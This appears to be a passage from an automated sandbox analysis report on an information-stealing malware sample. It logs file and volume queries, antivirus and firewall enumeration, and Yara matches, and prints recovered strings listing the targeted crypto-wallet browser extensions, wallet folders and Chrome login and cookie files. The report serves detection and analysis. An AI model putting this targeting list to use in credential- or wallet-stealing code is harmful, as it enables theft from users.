                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\TAPI\ZWgKQlTqcrSB.exe VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: 0_2_00B3DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B3DF1E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: 0_2_00B2B146 GetVersionExW,0_2_00B2B146
                          Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match File source: updIMdPUj8.exe, type: SAMPLE
                          Source: Yara match File source: 5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match File source: 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: updIMdPUj8.exe PID: 7324, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: hypersurrogateComponentdhcp.exe PID: 7600, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: ZWgKQlTqcrSB.exe PID: 3300, type: MEMORYSTR
                          Source: Yara match File source: C:\Recovery\csrss.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, type: DROPPED
                          Source: Yara match File source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, type: DROPPED
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\8
                          Source: hypersurrogateComponentdhcp.exe, 00000005.00000002.1889265427.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: powershell.exe, 00000007.00000002.2828919163.00007FFD9BBC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
